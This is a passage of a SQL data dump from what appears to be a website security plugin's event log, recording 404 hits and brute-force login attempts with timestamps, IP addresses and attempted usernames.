18:47:48','2020-09-14 23:47:48','13.90.35.80',NULL,NULL),(70895,'four_oh_four','2020-09-14 18:47:56','2020-09-14 23:47:56','13.90.35.80',NULL,NULL),(70896,'four_oh_four','2020-09-14 18:48:16','2020-09-14 23:48:16','13.90.35.80',NULL,NULL),(70897,'four_oh_four','2020-09-14 18:48:24','2020-09-14 23:48:24','13.90.35.80',NULL,NULL),(70898,'four_oh_four','2020-09-14 18:48:30','2020-09-14 23:48:30','13.90.35.80',NULL,NULL),(70899,'four_oh_four','2020-09-14 18:48:37','2020-09-14 23:48:37','13.90.35.80',NULL,NULL),(70900,'four_oh_four','2020-09-14 18:49:00','2020-09-14 23:49:00','13.90.35.80',NULL,NULL),(70901,'four_oh_four','2020-09-14 18:49:13','2020-09-14 23:49:13','13.90.35.80',NULL,NULL),(70902,'four_oh_four','2020-09-14 18:49:18','2020-09-14 23:49:18','13.90.35.80',NULL,NULL),(70903,'four_oh_four','2020-09-14 18:50:00','2020-09-14 23:50:00','13.90.35.80',NULL,NULL),(70904,'four_oh_four','2020-09-14 18:50:10','2020-09-14 23:50:10','13.90.35.80',NULL,NULL),(70905,'four_oh_four','2020-09-14 18:50:13','2020-09-14 23:50:13','13.90.35.80',NULL,NULL),(70906,'four_oh_four','2020-09-14 18:50:25','2020-09-14 23:50:25','13.90.35.80',NULL,NULL),(70907,'four_oh_four','2020-09-14 18:50:35','2020-09-14 23:50:35','13.90.35.80',NULL,NULL),(70908,'four_oh_four','2020-09-14 18:51:14','2020-09-14 23:51:14','13.90.35.80',NULL,NULL),(70909,'four_oh_four','2020-09-14 18:51:20','2020-09-14 23:51:20','13.90.35.80',NULL,NULL),(70910,'four_oh_four','2020-09-14 18:51:27','2020-09-14 23:51:27','13.90.35.80',NULL,NULL),(70911,'four_oh_four','2020-09-14 18:53:11','2020-09-14 23:53:11','13.90.35.80',NULL,NULL),(70912,'four_oh_four','2020-09-14 18:53:45','2020-09-14 23:53:45','13.90.35.80',NULL,NULL),(70913,'four_oh_four','2020-09-14 20:04:58','2020-09-15 01:04:58','114.119.157.110',NULL,NULL),(70914,'four_oh_four','2020-09-14 21:14:26','2020-09-15 02:14:26','114.119.148.105',NULL,NULL),(70915,'four_oh_four','2020-09-14 21:56:33','2020-09-15 02:56:33','5.188.84.251',NULL,NULL),(70916,'four_oh_four','2020-09-14 23:04:04','2020-09-15 04:04:04','114.119.158.13',NULL,NULL),(70917,'four_oh_four','2020-09-14 23:21:54','2020-09-15 04:21:54','5.253.19.146',NULL,NULL),(70918,'four_oh_four','2020-09-15 00:11:59','2020-09-15 05:11:59','46.118.122.191',NULL,NULL),(70919,'four_oh_four','2020-09-15 02:34:41','2020-09-15 07:34:41','157.55.39.142',NULL,NULL),(70920,'four_oh_four','2020-09-15 03:01:29','2020-09-15 08:01:29','114.119.136.66',NULL,NULL),(70921,'four_oh_four','2020-09-15 05:00:25','2020-09-15 10:00:25','114.119.151.107',NULL,NULL),(70922,'four_oh_four','2020-09-15 06:26:29','2020-09-15 11:26:29','114.119.143.145',NULL,NULL),(70923,'four_oh_four','2020-09-15 06:58:58','2020-09-15 11:58:58','207.46.13.36',NULL,NULL),(70924,'four_oh_four','2020-09-15 07:17:09','2020-09-15 12:17:09','114.119.158.13',NULL,NULL),(70925,'four_oh_four','2020-09-15 08:40:48','2020-09-15 13:40:48','78.138.157.42',NULL,NULL),(70926,'four_oh_four','2020-09-15 08:41:53','2020-09-15 13:41:53','162.243.29.24',NULL,NULL),(70927,'four_oh_four','2020-09-15 09:39:26','2020-09-15 14:39:26','114.119.141.146',NULL,NULL),(70928,'four_oh_four','2020-09-15 10:03:46','2020-09-15 15:03:46','114.119.134.41',NULL,NULL),(70929,'four_oh_four','2020-09-15 10:37:15','2020-09-15 15:37:15','207.46.13.17',NULL,NULL),(70930,'four_oh_four','2020-09-15 11:17:22','2020-09-15 16:17:22','114.119.141.146',NULL,NULL),(70931,'four_oh_four','2020-09-15 14:17:44','2020-09-15 19:17:44','184.154.139.18',NULL,NULL),(70932,'four_oh_four','2020-09-15 16:12:13','2020-09-15 21:12:13','114.119.148.105',NULL,NULL),(70933,'four_oh_four','2020-09-15 16:56:48','2020-09-15 21:56:48','114.119.141.146',NULL,NULL),(70934,'four_oh_four','2020-09-15 17:48:55','2020-09-15 22:48:55','114.119.143.145',NULL,NULL),(70935,'four_oh_four','2020-09-15 18:10:57','2020-09-15 23:10:57','20.185.0.202',NULL,NULL),(70936,'four_oh_four','2020-09-15 18:11:16','2020-09-15 23:11:16','20.185.0.202',NULL,NULL),(70937,'four_oh_four','2020-09-15 18:11:22','2020-09-15 23:11:22','20.185.0.202',NULL,NULL),(70938,'four_oh_four','2020-09-15 18:11:27','2020-09-15 23:11:27','20.185.0.202',NULL,NULL),(70939,'four_oh_four','2020-09-15 18:11:46','2020-09-15 23:11:46','20.185.0.202',NULL,NULL),(70940,'four_oh_four','2020-09-15 18:11:57','2020-09-15 23:11:57','20.185.0.202',NULL,NULL),(70941,'four_oh_four','2020-09-15 19:04:56','2020-09-16 00:04:56','114.119.143.145',NULL,NULL),(70942,'four_oh_four','2020-09-15 19:33:21','2020-09-16 00:33:21','162.241.225.75',NULL,NULL),(70943,'four_oh_four','2020-09-15 19:51:34','2020-09-16 00:51:34','40.77.167.114',NULL,NULL),(70944,'four_oh_four','2020-09-15 20:09:38','2020-09-16 01:09:38','114.119.141.146',NULL,NULL),(70945,'four_oh_four','2020-09-15 21:11:14','2020-09-16 02:11:14','193.106.30.99',NULL,NULL),(70946,'four_oh_four','2020-09-15 23:07:16','2020-09-16 04:07:16','37.44.254.213',NULL,NULL),(70947,'four_oh_four','2020-09-15 23:07:21','2020-09-16 04:07:21','37.44.254.213',NULL,NULL),(70948,'four_oh_four','2020-09-15 23:23:52','2020-09-16 04:23:52','185.206.213.233',NULL,NULL),(70949,'four_oh_four','2020-09-16 00:29:32','2020-09-16 05:29:32','114.119.134.41',NULL,NULL),(70950,'four_oh_four','2020-09-16 01:26:43','2020-09-16 06:26:43','66.249.65.85',NULL,NULL),(70951,'four_oh_four','2020-09-16 03:01:43','2020-09-16 08:01:43','114.119.141.146',NULL,NULL),(70952,'four_oh_four','2020-09-16 06:05:12','2020-09-16 11:05:12','52.201.182.91',NULL,NULL),(70953,'four_oh_four','2020-09-16 06:05:45','2020-09-16 11:05:45','52.201.182.91',NULL,NULL),(70954,'four_oh_four','2020-09-16 06:06:59','2020-09-16 11:06:59','52.201.182.91',NULL,NULL),(70955,'four_oh_four','2020-09-16 06:07:19','2020-09-16 11:07:19','52.201.182.91',NULL,NULL),(70956,'four_oh_four','2020-09-16 06:07:25','2020-09-16 11:07:25','52.201.182.91',NULL,NULL),(70957,'four_oh_four','2020-09-16 06:07:34','2020-09-16 11:07:34','52.201.182.91',NULL,NULL),(70958,'four_oh_four','2020-09-16 06:35:18','2020-09-16 11:35:18','52.201.182.91',NULL,NULL),(70959,'four_oh_four','2020-09-16 06:35:52','2020-09-16 11:35:52','52.201.182.91',NULL,NULL),(70960,'four_oh_four','2020-09-16 06:37:12','2020-09-16 11:37:12','52.201.182.91',NULL,NULL),(70961,'four_oh_four','2020-09-16 06:37:34','2020-09-16 11:37:34','52.201.182.91',NULL,NULL),(70962,'four_oh_four','2020-09-16 06:37:40','2020-09-16 11:37:40','52.201.182.91',NULL,NULL),(70963,'four_oh_four','2020-09-16 06:37:47','2020-09-16 11:37:47','52.201.182.91',NULL,NULL),(70964,'four_oh_four','2020-09-16 06:57:53','2020-09-16 11:57:53','114.119.145.125',NULL,NULL),(70965,'four_oh_four','2020-09-16 08:17:00','2020-09-16 13:17:00','114.119.148.105',NULL,NULL),(70966,'four_oh_four','2020-09-16 08:51:56','2020-09-16 13:51:56','114.119.145.125',NULL,NULL),(70967,'four_oh_four','2020-09-16 08:57:02','2020-09-16 13:57:02','114.119.145.125',NULL,NULL),(70968,'four_oh_four','2020-09-16 09:10:35','2020-09-16 14:10:35','114.119.141.146',NULL,NULL),(70969,'four_oh_four','2020-09-16 14:08:13','2020-09-16 19:08:13','184.154.139.21',NULL,NULL),(70970,'four_oh_four','2020-09-16 15:43:32','2020-09-16 20:43:32','5.188.84.251',NULL,NULL),(70971,'four_oh_four','2020-09-16 17:31:30','2020-09-16 22:31:30','207.46.13.239',NULL,NULL),(70972,'four_oh_four','2020-09-16 17:41:46','2020-09-16 22:41:46','114.119.148.105',NULL,NULL),(70973,'four_oh_four','2020-09-16 17:48:31','2020-09-16 22:48:31','114.119.134.41',NULL,NULL),(70974,'four_oh_four','2020-09-16 18:39:37','2020-09-16 23:39:37','5.188.84.251',NULL,NULL),(70975,'four_oh_four','2020-09-16 21:54:25','2020-09-17 02:54:25','104.214.24.124',NULL,NULL),(70976,'four_oh_four','2020-09-16 21:54:38','2020-09-17 02:54:38','104.214.24.124',NULL,NULL),(70977,'four_oh_four','2020-09-16 21:55:14','2020-09-17 02:55:14','104.214.24.124',NULL,NULL),(70978,'four_oh_four','2020-09-16 21:55:32','2020-09-17 02:55:32','104.214.24.124',NULL,NULL),(70979,'four_oh_four','2020-09-16 21:55:48','2020-09-17 02:55:48','104.214.24.124',NULL,NULL),(70980,'four_oh_four','2020-09-16 21:56:07','2020-09-17 02:56:07','104.214.24.124',NULL,NULL),(70981,'four_oh_four','2020-09-16 21:56:22','2020-09-17 02:56:22','104.214.24.124',NULL,NULL),(70982,'four_oh_four','2020-09-16 21:56:38','2020-09-17 02:56:38','104.214.24.124',NULL,NULL),(70983,'four_oh_four','2020-09-16 21:57:07','2020-09-17 02:57:07','104.214.24.124',NULL,NULL),(70984,'four_oh_four','2020-09-16 21:57:22','2020-09-17 02:57:22','104.214.24.124',NULL,NULL),(70985,'four_oh_four','2020-09-16 21:57:37','2020-09-17 02:57:37','104.214.24.124',NULL,NULL),(70986,'four_oh_four','2020-09-16 21:58:07','2020-09-17 02:58:07','104.214.24.124',NULL,NULL),(70987,'four_oh_four','2020-09-16 21:58:25','2020-09-17 02:58:25','104.214.24.124',NULL,NULL),(70988,'four_oh_four','2020-09-16 21:58:45','2020-09-17 02:58:45','104.214.24.124',NULL,NULL),(70989,'four_oh_four','2020-09-16 21:59:41','2020-09-17 02:59:41','104.214.24.124',NULL,NULL),(70990,'four_oh_four','2020-09-16 22:00:00','2020-09-17 03:00:00','104.214.24.124',NULL,NULL),(70991,'four_oh_four','2020-09-16 22:00:10','2020-09-17 03:00:10','104.214.24.124',NULL,NULL),(70992,'four_oh_four','2020-09-16 22:00:24','2020-09-17 03:00:24','104.214.24.124',NULL,NULL),(70993,'four_oh_four','2020-09-16 22:01:03','2020-09-17 03:01:03','104.214.24.124',NULL,NULL),(70994,'four_oh_four','2020-09-16 22:01:18','2020-09-17 03:01:18','104.214.24.124',NULL,NULL),(70995,'four_oh_four','2020-09-16 22:01:44','2020-09-17 03:01:44','77.88.5.218',NULL,NULL),(70996,'four_oh_four','2020-09-16 22:24:16','2020-09-17 03:24:16','178.159.37.88',NULL,NULL),(70997,'four_oh_four','2020-09-16 23:25:40','2020-09-17 04:25:40','114.119.141.146',NULL,NULL),(70998,'four_oh_four','2020-09-16 23:37:10','2020-09-17 04:37:10','52.191.189.177',NULL,NULL),(70999,'four_oh_four','2020-09-16 23:37:31','2020-09-17 04:37:31','52.191.189.177',NULL,NULL),(71000,'four_oh_four','2020-09-16 23:37:45','2020-09-17 04:37:45','52.191.189.177',NULL,NULL),(71001,'four_oh_four','2020-09-16 23:38:05','2020-09-17 04:38:05','52.191.189.177',NULL,NULL),(71002,'four_oh_four','2020-09-16 23:38:35','2020-09-17 04:38:35','52.191.189.177',NULL,NULL),(71003,'four_oh_four','2020-09-16 23:38:46','2020-09-17 04:38:46','52.191.189.177',NULL,NULL),(71004,'four_oh_four','2020-09-16 23:39:07','2020-09-17 04:39:07','52.191.189.177',NULL,NULL),(71005,'four_oh_four','2020-09-16 23:40:04','2020-09-17 04:40:04','52.191.189.177',NULL,NULL),(71006,'four_oh_four','2020-09-16 23:40:14','2020-09-17 04:40:14','52.191.189.177',NULL,NULL),(71007,'four_oh_four','2020-09-16 23:40:35','2020-09-17 04:40:35','52.191.189.177',NULL,NULL),(71008,'four_oh_four','2020-09-16 23:40:53','2020-09-17 04:40:53','52.191.189.177',NULL,NULL),(71009,'four_oh_four','2020-09-16 23:41:26','2020-09-17 04:41:26','52.191.189.177',NULL,NULL),(71010,'four_oh_four','2020-09-16 23:41:31','2020-09-17 04:41:31','52.191.189.177',NULL,NULL),(71011,'four_oh_four','2020-09-16 23:43:27','2020-09-17 04:43:27','52.191.189.177',NULL,NULL),(71012,'four_oh_four','2020-09-16 23:43:44','2020-09-17 04:43:44','52.191.189.177',NULL,NULL),(71013,'four_oh_four','2020-09-16 23:44:26','2020-09-17 04:44:26','52.191.189.177',NULL,NULL),(71014,'four_oh_four','2020-09-16 23:44:37','2020-09-17 04:44:37','52.191.189.177',NULL,NULL),(71015,'four_oh_four','2020-09-16 23:45:07','2020-09-17 04:45:07','52.191.189.177',NULL,NULL),(71016,'four_oh_four','2020-09-16 23:45:11','2020-09-17 04:45:11','52.191.189.177',NULL,NULL),(71017,'four_oh_four','2020-09-16 23:46:01','2020-09-17 04:46:01','52.191.189.177',NULL,NULL),(71018,'four_oh_four','2020-09-16 23:47:13','2020-09-17 04:47:13','207.46.13.239',NULL,NULL),(71019,'four_oh_four','2020-09-17 00:00:45','2020-09-17 05:00:45','114.119.157.110',NULL,NULL),(71020,'four_oh_four','2020-09-17 00:08:15','2020-09-17 05:08:15','87.237.42.71',NULL,NULL),(71021,'four_oh_four','2020-09-17 01:18:45','2020-09-17 06:18:45','176.107.183.146',NULL,NULL),(71022,'four_oh_four','2020-09-17 04:34:40','2020-09-17 09:34:40','114.119.143.145',NULL,NULL),(71023,'four_oh_four','2020-09-17 06:15:10','2020-09-17 11:15:10','114.119.143.145',NULL,NULL),(71024,'four_oh_four','2020-09-17 06:24:35','2020-09-17 11:24:35','192.3.204.194',NULL,NULL),(71025,'four_oh_four','2020-09-17 06:30:50','2020-09-17 11:30:50','96.244.204.144',NULL,NULL),(71026,'four_oh_four','2020-09-17 06:41:07','2020-09-17 11:41:07','46.4.83.150',NULL,NULL),(71027,'four_oh_four','2020-09-17 07:45:15','2020-09-17 12:45:15','40.77.167.238',NULL,NULL),(71028,'four_oh_four','2020-09-17 08:40:08','2020-09-17 13:40:08','114.119.141.146',NULL,NULL),(71029,'four_oh_four','2020-09-17 09:46:54','2020-09-17 14:46:54','40.77.167.238',NULL,NULL),(71030,'four_oh_four','2020-09-17 09:56:59','2020-09-17 14:56:59','145.255.21.16',NULL,NULL),(71031,'four_oh_four','2020-09-17 10:08:08','2020-09-17 15:08:08','77.88.5.218',NULL,NULL),(71032,'four_oh_four','2020-09-17 10:50:26','2020-09-17 15:50:26','157.55.39.180',NULL,NULL),(71033,'four_oh_four','2020-09-17 10:55:25','2020-09-17 15:55:25','157.55.39.180',NULL,NULL),(71034,'four_oh_four','2020-09-17 11:01:09','2020-09-17 16:01:09','171.244.1.84',NULL,NULL),(71035,'four_oh_four','2020-09-17 12:48:05','2020-09-17 17:48:05','157.55.39.249',NULL,NULL),(71036,'four_oh_four','2020-09-17 12:51:39','2020-09-17 17:51:39','157.55.39.180',NULL,NULL),(71037,'four_oh_four','2020-09-17 13:40:57','2020-09-17 18:40:57','40.77.167.238',NULL,NULL),(71038,'four_oh_four','2020-09-17 13:51:22','2020-09-17 18:51:22','85.203.44.82',NULL,NULL),(71039,'four_oh_four','2020-09-17 13:53:09','2020-09-17 18:53:09','157.55.39.180',NULL,NULL),(71040,'four_oh_four','2020-09-17 14:02:31','2020-09-17 19:02:31','184.154.139.17',NULL,NULL),(71041,'four_oh_four','2020-09-17 15:22:02','2020-09-17 20:22:02','217.138.209.245',NULL,NULL),(71042,'four_oh_four','2020-09-17 16:36:35','2020-09-17 21:36:35','114.119.134.41',NULL,NULL),(71043,'four_oh_four','2020-09-17 18:22:03','2020-09-17 23:22:03','5.188.210.18',NULL,NULL),(71044,'four_oh_four','2020-09-17 19:03:28','2020-09-18 00:03:28','114.119.151.107',NULL,NULL),(71045,'four_oh_four','2020-09-17 20:46:13','2020-09-18 01:46:13','68.134.0.169',NULL,NULL),(71046,'four_oh_four','2020-09-17 20:46:29','2020-09-18 01:46:29','68.134.0.169',NULL,NULL),(71047,'four_oh_four','2020-09-17 20:50:06','2020-09-18 01:50:06','188.122.82.146',NULL,NULL),(71048,'four_oh_four','2020-09-17 20:50:08','2020-09-18 01:50:08','188.122.82.146',NULL,NULL),(71049,'four_oh_four','2020-09-17 22:15:02','2020-09-18 03:15:02','114.119.145.125',NULL,NULL),(71050,'four_oh_four','2020-09-17 23:16:11','2020-09-18 04:16:11','5.188.84.119',NULL,NULL),(71051,'four_oh_four','2020-09-17 23:21:31','2020-09-18 04:21:31','31.13.127.3',NULL,NULL),(71052,'four_oh_four','2020-09-17 23:23:21','2020-09-18 04:23:21','173.252.107.7',NULL,NULL),(71053,'four_oh_four','2020-09-18 00:58:08','2020-09-18 05:58:08','114.119.141.146',NULL,NULL),(71054,'four_oh_four','2020-09-18 01:15:36','2020-09-18 06:15:36','20.185.0.202',NULL,NULL),(71055,'four_oh_four','2020-09-18 01:15:56','2020-09-18 06:15:56','20.185.0.202',NULL,NULL),(71056,'four_oh_four','2020-09-18 01:16:10','2020-09-18 06:16:10','20.185.0.202',NULL,NULL),(71057,'four_oh_four','2020-09-18 01:16:12','2020-09-18 06:16:12','20.185.0.202',NULL,NULL),(71058,'four_oh_four','2020-09-18 01:16:16','2020-09-18 06:16:16','20.185.0.202',NULL,NULL),(71059,'four_oh_four','2020-09-18 01:16:30','2020-09-18 06:16:30','20.185.0.202',NULL,NULL),(71060,'four_oh_four','2020-09-18 02:11:08','2020-09-18 07:11:08','92.124.163.21',NULL,NULL),(71061,'four_oh_four','2020-09-18 02:20:20','2020-09-18 07:20:20','114.119.130.104',NULL,NULL),(71062,'four_oh_four','2020-09-18 02:55:10','2020-09-18 07:55:10','92.124.163.21',NULL,NULL),(71063,'four_oh_four','2020-09-18 05:53:26','2020-09-18 10:53:26','40.77.167.238',NULL,NULL),(71064,'four_oh_four','2020-09-18 07:57:21','2020-09-18 12:57:21','40.77.167.29',NULL,NULL),(71065,'four_oh_four','2020-09-18 08:23:00','2020-09-18 13:23:00','176.107.183.146',NULL,NULL),(71066,'four_oh_four','2020-09-18 09:14:12','2020-09-18 14:14:12','157.55.39.111',NULL,NULL),(71067,'brute_force','2020-09-18 11:08:45','2020-09-18 16:08:45','68.134.121.122',NULL,NULL),(71068,'brute_force','2020-09-18 11:08:45','2020-09-18 16:08:45',NULL,NULL,'linda'),(71069,'four_oh_four','2020-09-18 13:41:20','2020-09-18 18:41:20','174.128.239.226',NULL,NULL),(71070,'four_oh_four','2020-09-18 14:05:55','2020-09-18 19:05:55','184.154.139.19',NULL,NULL),(71071,'four_oh_four','2020-09-18 14:06:31','2020-09-18 19:06:31','78.85.251.4',NULL,NULL),(71072,'four_oh_four','2020-09-18 14:34:11','2020-09-18 19:34:11','114.119.158.13',NULL,NULL),(71073,'four_oh_four','2020-09-18 14:45:09','2020-09-18 19:45:09','114.119.143.145',NULL,NULL),(71074,'four_oh_four','2020-09-18 16:19:46','2020-09-18 21:19:46','184.154.46.48',NULL,NULL),(71075,'four_oh_four','2020-09-18 16:43:54','2020-09-18 21:43:54','95.65.81.152',NULL,NULL),(71076,'four_oh_four','2020-09-18 18:47:48','2020-09-18 23:47:48','114.119.157.110',NULL,NULL),(71077,'four_oh_four','2020-09-18 19:11:31','2020-09-19 00:11:31','185.152.66.226',NULL,NULL),(71078,'four_oh_four','2020-09-18 19:30:21','2020-09-19 00:30:21','114.119.134.41',NULL,NULL),(71079,'four_oh_four','2020-09-18 20:07:47','2020-09-19 01:07:47','73.163.139.187',NULL,NULL),(71080,'four_oh_four','2020-09-18 20:09:13','2020-09-19 01:09:13','77.94.214.11',NULL,NULL),(71081,'four_oh_four','2020-09-18 21:25:27','2020-09-19 02:25:27','114.119.158.13',NULL,NULL),(71082,'four_oh_four','2020-09-18 22:48:52','2020-09-19 03:48:52','144.76.102.243',NULL,NULL),(71083,'four_oh_four','2020-09-19 01:04:02','2020-09-19 06:04:02','188.122.82.146',NULL,NULL),(71084,'four_oh_four','2020-09-19 01:12:59','2020-09-19 06:12:59','194.38.96.99',NULL,NULL),(71085,'four_oh_four','2020-09-19 03:01:52','2020-09-19 08:01:52','114.119.130.104',NULL,NULL),(71086,'four_oh_four','2020-09-19 04:38:32','2020-09-19 09:38:32','114.119.148.105',NULL,NULL),(71087,'four_oh_four','2020-09-19 05:17:25','2020-09-19 10:17:25','193.106.30.99',NULL,NULL),(71088,'four_oh_four','2020-09-19 07:22:21','2020-09-19 12:22:21','37.120.203.75',NULL,NULL),(71089,'four_oh_four','2020-09-19 08:20:42','2020-09-19 13:20:42','114.119.134.41',NULL,NULL),(71090,'four_oh_four','2020-09-19 08:22:16','2020-09-19 13:22:16','64.150.247.138',NULL,NULL),(71091,'four_oh_four','2020-09-19 08:34:12','2020-09-19 13:34:12','114.119.151.107',NULL,NULL),(71092,'four_oh_four','2020-09-19 09:33:45','2020-09-19 14:33:45','188.122.82.146',NULL,NULL),(71093,'four_oh_four','2020-09-19 09:55:42','2020-09-19 14:55:42','71.179.15.177',NULL,NULL),(71094,'four_oh_four','2020-09-19 09:55:45','2020-09-19 14:55:45','71.179.15.177',NULL,NULL),(71095,'four_oh_four','2020-09-19 10:21:34','2020-09-19 15:21:34','188.122.82.146',NULL,NULL),(71096,'four_oh_four','2020-09-19 11:52:43','2020-09-19 16:52:43','45.141.156.17',NULL,NULL),(71097,'four_oh_four','2020-09-19 13:53:54','2020-09-19 18:53:54','92.38.136.69',NULL,NULL),(71098,'four_oh_four','2020-09-19 13:54:04','2020-09-19 18:54:04','91.76.156.63',NULL,NULL),(71099,'four_oh_four','2020-09-19 14:10:35','2020-09-19 19:10:35','184.154.139.3',NULL,NULL),(71100,'four_oh_four','2020-09-19 14:40:44','2020-09-19 19:40:44','92.38.136.69',NULL,NULL),(71101,'four_oh_four','2020-09-19 14:47:09','2020-09-19 19:47:09','188.122.82.146',NULL,NULL),(71102,'four_oh_four','2020-09-19 14:59:42','2020-09-19 19:59:42','176.107.183.146',NULL,NULL),(71103,'four_oh_four','2020-09-19 15:20:36','2020-09-19 20:20:36','46.187.25.61',NULL,NULL),(71104,'four_oh_four','2020-09-19 16:04:50','2020-09-19 21:04:50','40.77.167.223',NULL,NULL),(71105,'four_oh_four','2020-09-19 16:16:17','2020-09-19 21:16:17','68.134.0.169',NULL,NULL),(71106,'four_oh_four','2020-09-19 18:10:29','2020-09-19 23:10:29','40.77.167.236',NULL,NULL),(71107,'four_oh_four','2020-09-19 18:45:19','2020-09-19 23:45:19','78.85.251.4',NULL,NULL),(71108,'brute_force','2020-09-19 20:01:30','2020-09-20 01:01:30','178.137.165.159',NULL,NULL),(71109,'brute_force','2020-09-19 20:01:30','2020-09-20 01:01:30',NULL,NULL,'admin'),(71110,'brute_force','2020-09-19 20:01:32','2020-09-20 01:01:32','178.137.165.159',NULL,NULL),(71111,'brute_force','2020-09-19 20:01:32','2020-09-20 01:01:32',NULL,NULL,'admin'),(71112,'brute_force','2020-09-19 20:01:34','2020-09-20 01:01:34','178.137.165.159',NULL,NULL),(71113,'brute_force','2020-09-19 20:01:34','2020-09-20 01:01:34',NULL,NULL,'admin'),(71114,'brute_force','2020-09-19 20:01:36','2020-09-20 01:01:36','178.137.165.159',NULL,NULL),(71115,'brute_force','2020-09-19 20:01:36','2020-09-20 01:01:36',NULL,NULL,'admin'),(71116,'brute_force','2020-09-19 20:01:38','2020-09-20 01:01:38','178.137.165.159',NULL,NULL),(71117,'brute_force','2020-09-19 20:01:38','2020-09-20 01:01:38',NULL,NULL,'admin'),(71118,'four_oh_four','2020-09-19 20:54:32','2020-09-20 01:54:32','5.188.210.18',NULL,NULL),(71119,'four_oh_four','2020-09-19 21:01:08','2020-09-20 02:01:08','40.77.167.236',NULL,NULL),(71120,'four_oh_four','2020-09-19 21:31:03','2020-09-20 02:31:03','77.94.217.81',NULL,NULL),(71121,'four_oh_four','2020-09-19 21:43:58','2020-09-20 02:43:58','114.119.157.110',NULL,NULL),(71122,'four_oh_four','2020-09-19 22:56:42','2020-09-20 03:56:42','52.201.182.91',NULL,NULL),(71123,'four_oh_four','2020-09-19 22:56:46','2020-09-20 03:56:46','52.201.182.91',NULL,NULL),(71124,'four_oh_four','2020-09-19 22:56:49','2020-09-20 03:56:49','3.94.137.21',NULL,NULL),(71125,'four_oh_four','2020-09-19 22:56:51','2020-09-20 03:56:51','3.94.137.21',NULL,NULL),(71126,'four_oh_four','2020-09-20 00:04:29','2020-09-20 05:04:29','66.249.70.55',NULL,NULL),(71127,'four_oh_four','2020-09-20 01:57:04','2020-09-20 06:57:04','114.119.141.146',NULL,NULL),(71128,'four_oh_four','2020-09-20 02:21:56','2020-09-20 07:21:56','192.185.129.21',NULL,NULL),(71129,'four_oh_four','2020-09-20 02:41:18','2020-09-20 07:41:18','114.119.158.13',NULL,NULL),(71130,'four_oh_four','2020-09-20 04:17:16','2020-09-20 09:17:16','114.119.145.125',NULL,NULL),(71131,'four_oh_four','2020-09-20 06:25:21','2020-09-20 11:25:21','157.55.39.194',NULL,NULL),(71132,'four_oh_four','2020-09-20 06:38:17','2020-09-20 11:38:17','66.249.65.85',NULL,NULL),(71133,'four_oh_four','2020-09-20 06:46:54','2020-09-20 11:46:54','114.119.135.206',NULL,NULL),(71134,'four_oh_four','2020-09-20 07:06:43','2020-09-20 12:06:43','45.141.156.26',NULL,NULL),(71135,'four_oh_four','2020-09-20 07:07:04','2020-09-20 12:07:04','62.210.103.67',NULL,NULL),(71136,'four_oh_four','2020-09-20 07:10:21','2020-09-20 12:10:21','95.72.148.215',NULL,NULL),(71137,'four_oh_four','2020-09-20 07:39:55','2020-09-20 12:39:55','114.119.158.13',NULL,NULL),(71138,'four_oh_four','2020-09-20 08:22:11','2020-09-20 13:22:11','114.119.148.105',NULL,NULL),(71139,'four_oh_four','2020-09-20 09:25:17','2020-09-20 14:25:17','157.55.39.194',NULL,NULL),(71140,'four_oh_four','2020-09-20 09:30:25','2020-09-20 14:30:25','78.46.94.83',NULL,NULL),(71141,'four_oh_four','2020-09-20 09:30:28','2020-09-20 14:30:28','78.46.94.83',NULL,NULL),(71142,'four_oh_four','2020-09-20 10:15:06','2020-09-20 15:15:06','207.46.13.159',NULL,NULL),(71143,'four_oh_four','2020-09-20 11:32:49','2020-09-20 16:32:49','207.46.13.159',NULL,NULL),(71144,'four_oh_four','2020-09-20 11:42:14','2020-09-20 16:42:14','45.141.156.26',NULL,NULL),(71145,'four_oh_four','2020-09-20 11:46:07','2020-09-20 16:46:07','192.99.14.187',NULL,NULL),(71146,'four_oh_four','2020-09-20 11:46:49','2020-09-20 16:46:49','192.99.14.187',NULL,NULL),(71147,'four_oh_four','2020-09-20 11:50:19','2020-09-20 16:50:19','192.99.14.187',NULL,NULL),(71148,'four_oh_four','2020-09-20 11:51:43','2020-09-20 16:51:43','192.99.14.187',NULL,NULL),(71149,'four_oh_four','2020-09-20 12:20:42','2020-09-20 17:20:42','157.55.39.194',NULL,NULL),(71150,'brute_force','2020-09-20 12:30:10','2020-09-20 17:30:10','23.96.3.40',NULL,NULL),(71151,'brute_force','2020-09-20 12:30:10','2020-09-20 17:30:10',NULL,NULL,'admin'),(71152,'brute_force','2020-09-20 12:30:12','2020-09-20 17:30:12','23.96.3.40',NULL,NULL),(71153,'brute_force','2020-09-20 12:30:12','2020-09-20 17:30:12',NULL,NULL,'admin'),(71154,'brute_force','2020-09-20 12:30:14','2020-09-20 17:30:14','23.96.3.40',NULL,NULL),(71155,'brute_force','2020-09-20 12:30:14','2020-09-20 17:30:14',NULL,NULL,'admin'),(71156,'brute_force','2020-09-20 12:30:15','2020-09-20 17:30:15','23.96.3.40',NULL,NULL),(71157,'brute_force','2020-09-20 12:30:15','2020-09-20 17:30:15',NULL,NULL,'admin'),(71158,'brute_force','2020-09-20 12:30:16','2020-09-20 17:30:16','23.96.3.40',NULL,NULL),(71159,'brute_force','2020-09-20 12:30:16','2020-09-20 17:30:16',NULL,NULL,'admin'),(71160,'four_oh_four','2020-09-20 14:01:54','2020-09-20 19:01:54','184.154.139.17',NULL,NULL),(71161,'four_oh_four','2020-09-20 14:07:05','2020-09-20 19:07:05','207.46.13.41',NULL,NULL),(71162,'four_oh_four','2020-09-20 14:14:58','2020-09-20 19:14:58','114.119.134.41',NULL,NULL),(71163,'four_oh_four','2020-09-20 14:19:49','2020-09-20 19:19:49','114.119.143.145',NULL,NULL),(71164,'four_oh_four','2020-09-20 14:22:01','2020-09-20 19:22:01','95.73.65.95',NULL,NULL),(71165,'four_oh_four','2020-09-20 15:17:34','2020-09-20 20:17:34','188.130.220.93',NULL,NULL),(71166,'four_oh_four','2020-09-20 15:23:14','2020-09-20 20:23:14','34.69.185.13',NULL,NULL),(71167,'four_oh_four','2020-09-20 16:44:11','2020-09-20 21:44:11','129.146.190.190',NULL,NULL),(71168,'four_oh_four','2020-09-20 19:07:50','2020-09-21 00:07:50','114.119.130.104',NULL,NULL),(71169,'four_oh_four','2020-09-20 19:45:08','2020-09-21 00:45:08','114.119.157.110',NULL,NULL),(71170,'four_oh_four','2020-09-20 20:10:05','2020-09-21 01:10:05','89.111.33.222',NULL,NULL),(71171,'four_oh_four','2020-09-20 21:35:23','2020-09-21 02:35:23','188.122.82.146',NULL,NULL),(71172,'four_oh_four','2020-09-20 21:54:28','2020-09-21 02:54:28','114.119.130.104',NULL,NULL),(71173,'four_oh_four','2020-09-20 